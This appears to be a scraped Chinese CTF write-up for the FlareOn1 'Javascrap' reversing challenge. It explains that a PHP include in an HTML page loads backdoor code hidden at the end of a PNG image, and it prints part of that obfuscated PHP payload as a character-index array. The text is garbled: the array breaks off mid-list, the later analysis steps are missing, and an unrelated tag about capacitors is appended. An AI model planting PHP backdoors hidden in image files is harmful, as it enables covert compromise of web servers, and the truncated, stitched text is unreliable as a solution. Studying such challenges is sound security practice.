CTF逆向-[FlareOn1]Javascrap-web逆向发现php逐步分析后门,获得后门密码
:https://buuoj.cn/
:
:链接:https://pan.baidu.com/s/1N2bN_TueCtuqTkNlE3tKeA?pwd=hqxm 提取码:hqxm
:a11.that.java5crap@flare-on.com
总体思路
文件夹的名字是c2.猜测是后门,所以发现了html文件中有异常include
查看include的文件发现php代码
分析代码发现后门post的参数
通过脑洞和直觉分析参数获得flag
详细步骤
-
拿到题目发现是一个html观察整个文件,发现文件尾部有一个
<?php include "img/flare-on.png" ?>,猜测是后门 -
在目录下找到flare-on.png,拖进
010editor(CTF逆向-常用的逆向工具 提取码:pnbt )查看内部,发现文件尾部有一些php执行 -
复制出来稍微处理一下
-
<?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", " ", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&" , "\'" , "!" , "x" , "G" , ":" , "2" , "~" , "O" , "h" , "u" , "U" , "@" , ";" , "H" , "3" , "F" , "6" , "b" , "L" , ">" , "^" , "," , "." , "l" , "$" , "d" , "`" , "%" , "N" , "*" , "[" , "0" , "}" , "J" , "-" , "5" , "_" , "A" , "=" , "{" , "k" , "o" , "7" , "#" , "i" , "I" , "Y" , "(" , "j" , "/" , "?" , "K" , "c" , "B" , "t" , "R" , "4" , "8" , "e" , "|" ) ; $order = array ( 59 , 71 , 73 , 13 , 35 , 10 , 20 , 81 , 76 , 10 , 28 , 63 , 12 , 1 , 28 , 11 , 76 , 68 , 50 , 30 , 11 , 24 , 7 , 63 , 45 , 20 , 23 , 68 , 87 , 42 , 24 , 60 , 87 , 63 , 18 , 58 , 87 , 63 , 18 , 58 , 87 , 63 , 83 , 43 , 87 , 93 , 18 , 90 , 38 , 28 , 18 , 19 , 66 , 28 , 18 , 17 , 37 , 63 , 58 , 37 , 91 , 63 , 83 , 43 , 87 , 42 , 24 , 60 , 87 , 93 , 18 , 87 , 66 , 28 , 48 , 19 , 66 , 63 , 50 , 37 , 91 , 63 , 17 , 1 , 87 , 93 , 18 , 45 , 66 , 28 , 48 , 19 , 40 , 11 , 25 , 5 , 70 , 63 , 7 , 37 , 91 , 63 , 12 , 1 , 87 , 93 , 18 , 81 , 37 , 28 , 48 , 19 , 12 , 63 , 25 , 37 , 91 , 63 , 83 , 63 , 87 , 93 , 18 , 87 , 23 , 28 , 18 , 75 , 49 , 28 , 48 , 19 , 49 , 0 , 50 , 37 , 91 , 63 , 18 , 50 , 87 , 42 , 18 , 90 , 87 , 93 , 18 , 81 , 40 , 28 , 48 , 19 , 40 , 11 , 7 , 5 , 70 , 63 , 7 , 37 , 91 , 63 , 12 , 68 , 87 , 93 , 18 , 81 , 7 , 28 , 48 , 19 , 66 , 63 , 50 , 5 , 40 , 63 , 25 , 37 , 91 , 63 , 24 , 63 , 87 , 63 , 12 , 68 , 87 , 0 , 24 , 17 , 37 , 28 , 18 , 17 , 37 , 0 , 50 , 5 , 40 , 42 , 50 , 5 , 49 , 42 , 25 , 5 , 91 , 63 , 50 , 5 , 70 , 42 , 25 , 37 , 91 , 63 , 75 , 1 , 87 , 93 , 18 , 1 , 17 , 80 , 58 , 66 , 3 , 86 , 27 , 88 , 77 , 80 , 38 , 25 , 40 , 81 , 20 , 5 , 76 , 81 , 15 , 50 , 12 , 1 , 24 , 81 , 66 , 28 , 40 , 90 , 58 , 81 , 40 , 30 , 75 , 1 , 27 , 19 , 75 , 28 , 7 , 88 , 32 , 45 , 7 , 90 , 52 , 80 , 58 , 5 , 70 , 63 , 7 , 5 , 66 , 42 , 25 , 37 , 91 , 0 , 12 , 50 , 87 , 63 , 83 , 43 , 87 , 93 , 18 , 90 , 38 , 28 , 48 , 19 , 7 , 63 , 50 , 5 , 37 , 0 , 24 , 1 , 87 , 0 , 24 , 72 , 66 , 28 , 48 , 19 , 40 , 0 , 25 , 5 , 37 , 0 , 24 , 1 , 87 , 93 , 18 , 11 , 66 , 28 , 18 , 87 , 70 , 28 , 48 , 19 , 7 , 63 , 50 , 5 , 37 , 0 , 18 , 1 , 87 , 42 , 24 , 60 , 87 , 0 , 24 , 17 , 91 , 28 , 18 , 75 , 49 , 28 , 18 , 45 , 12 , 28 , 48 , 19 , 40 , 0 , 7 , 5 , 37 , 0 , 24 , 90 , 87 , 93 , 18 , 81 , 37 , 28 , 48 , 19 , 49 , 0 , 50 , 5 , 40 , 63 , 25 , 5 , 91 , 63 , 50 , 5 , 37 , 0 , 18 , 68 , 87 , 93 , 18 , 1 , 18 , 28 , 48 , 19 , 40 , 0 , 25 , 5 , 37 , 0 , 24 , 90 , 87 , 0 , 24 , 72 , 37 , 28 , 48 , 19 , 66 , 63 , 50 , 5 , 40 , 63 , 25 , 37 , 91 , 63 , 24 , 63 , 87 , 63 , 12 , 68 , 87 , 0 , 24 , 17 , 37 , 28 , 48 , 19 , 40 , 90 , 25 , 37 , 91 , 63 , 18 , 90 , 87 , 93 , 18 , 90 , 38 , 28 , 18 , 19 , 66 , 28 , 18 , 75 , 70 , 28 , 48 , 19 , 40 , 90 , 58 , 37 , 91 , 63 , 75 , 11 , 79 , 28 , 27 , 75 , 3 , 42 , 23 , 88 , 30 , 35 , 47 , 59 , 71 , 71 , 73 , 35 , 68 , 38 , 63 , 8 , 1 , 38 , 45 , 30 , 81 , 15 , 50 , 12 , 1 , 24 , 81 , 66 , 28 , 标签: 电容rlx能代替rls
-
